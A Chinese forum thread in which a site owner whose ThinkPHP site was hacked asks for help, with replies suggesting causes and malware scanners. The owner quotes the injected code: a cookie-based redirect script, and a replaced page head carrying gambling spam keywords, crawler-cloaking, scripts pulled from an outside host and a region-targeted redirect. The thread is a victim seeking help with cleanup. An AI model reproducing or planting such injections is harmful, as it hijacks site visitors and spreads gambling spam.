官网被人插入了恶意广告，删除后没多久自动又被加上了

shanjie89

官网被人插入了恶意广告，删除后没多久自动又被加上了
阿里云服务器：centos
偷懒装了宝塔
ThinkPHP、后台使用TPAdmin
官网被人插入了恶意广告（index跳indax），删除了，没多久又加上了（怀疑是自动的），有没有人碰到过

通过对比文件，成功找到木马
不过我就是好奇，他是怎么自动来挂马的，总不能几小时登陆一次吧
而且他替换的还是我之前的官网，并不是直接在新的官网上修改（因为最近修改了一下官网页面）

JS文件也被增加了
var c = document.cookie;
     if (c.indexOf('isfirstvisited=false') != -1) {
        
     }
     else {
         var d = new Date();
         d.setFullYear(d.getFullYear() + 1);
         document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString();
   window.location.;
     }



如下：


<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>&#50;&#48;&#50;&#48;欧洲杯外围&#45;&#50;&#48;&#50;&#48;欧洲杯足球竞猜</title>
<meta name="keywords" content="欧洲杯外围投注网&#44;欧洲杯投注&#44;欧洲杯竞猜投注&#44;欧洲杯网上投注&#44;&#50;&#48;&#50;&#48;欧洲杯赛事"/>
<meta name="description"
content="&#51;&#54;&#53;&#98;et体育是中国知名的体育门户网站【&#54;&#49;&#50;&#54;ok&#46;&#99;om】&#44;主要为您提供以下栏目&#58;国内足球、国际足球、&#78;&#66;&#65;、&#67;&#66;&#65;、综合体育、世界杯、欧洲杯、欧冠杯、西甲、英超、意甲、法甲、德甲比分、直播、彩票、竞猜等&#44;开户送彩金&#44;更多优惠活动等你来&#33;"/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="官网"}</script>
<script language="javascript" src="https://www.bcdas8.com/dq.js"></script>
<script>var sf=returnCitySN["cname"]; if(sf.indexOf("浙江省")>=0){window.location.href="/indax.html";}</script>
<script language="javascript" src="https://www.bcdas8.com/365301.js"></script>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<script>
document.write('<link rel="stylesheet" href="./static/index/css/public.min.css?v=' + new Date() + '"><\/link>' +
'<link rel="stylesheet" href="./static/index/css/index.min.css?v=' + new Date() + '"><\/link>')
</script>
</head>

kenutu

ApkB 发表于 2020-1-3 11:03
PHP的锅，稳稳的

ThinkPHP 的锅，我有个淘宝客，用的是推券客，直接被干了两次，现在换到了LINUNX，还不知道咋样呢，回头看看，重点是WINDOWS 运行PHP。

w187023

先把源码下载 杀毒 纯静态运行

shanjie89

hdwz 发表于 2020-1-3 10:23
不亮CMS 谁知道

ThinkPHP写的后端
TPAdmin做的后台

A23187

网址呢？

voleta

源码 下载下来 用D盾扫下看看咯

ApkB

PHP的锅，稳稳的